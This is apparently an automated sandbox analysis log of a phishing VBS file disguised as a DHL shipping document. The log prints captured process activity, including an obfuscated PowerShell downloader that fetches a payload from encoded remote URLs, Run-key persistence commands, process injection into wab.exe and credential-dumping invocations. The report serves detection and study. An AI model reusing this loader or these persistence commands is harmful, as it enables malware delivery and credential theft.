              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004014AB22_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040513322_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004051A422_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040124622_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040CA4622_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040523522_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004032C822_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040168922_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00402F6022_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: DHL Shipping Document Awb & BL.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: amsi32_7792.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winVBS@31/12@12/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,19_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,22_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,19_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,19_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,19_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Proskriberes.BetJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gslda24.jeh.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7548
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7792
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000013.00000002.2023090570.00000000038AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_21-33248
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp"Jump to behavior
